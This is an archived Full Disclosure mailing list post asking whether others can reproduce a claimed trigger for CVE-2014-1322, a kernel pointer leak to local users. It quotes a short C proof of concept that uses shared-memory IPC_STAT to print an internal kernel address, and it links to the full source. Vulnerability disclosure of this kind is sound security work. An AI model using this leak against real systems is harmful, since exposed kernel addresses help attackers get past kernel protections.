[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] A way to trigger CVE-2014-1322 (userspace read kernel pointer)?

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] A way to trigger CVE-2014-1322 (userspace read kernel pointer)?
From: rai@xxxxxxxxxxxxxxx
Date: Tue, 20 May 2014 10:45:38 +0000

 

Hi,

There's a claim this triggers CVE-2014-1322 allowing local user to read
a kernel pointer:

int shm = shmget( IPC_PRIVATE, 0x1337, SHM_R | SHM_W );
struct shmid_ds lolz;
int res = shmctl( shm, IPC_STAT, &lolz );
printf( "%pn", lolz.shm_internal );

full source: http://maker.fea.st/CVE-2014-1322.c [1]

Is anyone able to reproduce?

--
rai

 

Links:
------
[1] http://maker.fea.st/CVE-2014-1322.c

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Follow-Ups:
- Re: [FD] A way to trigger CVE-2014-1322 (userspace read kernel pointer)?
  - From: Christian Mayer

Prev by Date: [FD] Project Un1c0rn : Communications and GPG Key
Next by Date: [FD] Beginners error: Hewlett-Packards driver software executes rogue binary C:\Program.exe
Previous by thread: [FD] Project Un1c0rn : Communications and GPG Key
Next by thread: Re: [FD] A way to trigger CVE-2014-1322 (userspace read kernel pointer)?
Index(es):
- Date
- Thread